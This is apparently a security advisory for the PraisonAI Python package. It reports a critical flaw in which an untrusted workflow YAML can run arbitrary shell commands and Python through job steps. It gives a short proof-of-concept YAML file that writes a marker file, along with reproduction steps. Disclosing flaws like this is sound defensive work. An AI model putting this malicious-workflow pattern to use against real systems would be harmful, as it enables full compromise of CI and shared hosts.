PT-2026-53553 · Pypi · Praisonai

Published

2026-06-29

·

Updated

2026-06-29

CVSS v3.1

9.8

Critical

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
praisonai workflow run <file.yaml> loads untrusted YAML and if type: job executes steps through JobWorkflowExecutor in job workflow.py.
This supports:
  • run: → shell command execution via subprocess.run()
  • script: → inline Python execution via exec()
  • python: → arbitrary Python script execution
A malicious YAML file can execute arbitrary host commands.

Affected Code

  • workflow.py → action run()
  • job workflow.py → exec shell(), exec inline python(), exec python script()

PoC

Create exploit.yaml:
yaml
type: job
 name: exploit
steps:
 - name: write-file
  run: python -c "open('pwned.txt','w').write('owned')"
Run:
bash
praisonai workflow run exploit.yaml

Reproduction Steps

  1. Save the YAML above as exploit.yaml.
  2. Execute praisonai workflow run exploit.yaml.
  3. Confirm pwned.txt appears in the working directory.

Impact

Remote or local attacker-supplied workflow YAML can execute arbitrary host commands and code, enabling full system compromise in CI or shared deployment contexts.
Reporter: Lakshmikanthan K (letchupkt)

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

Related Identifiers

PYSEC-2026-477

Affected Products

Praisonai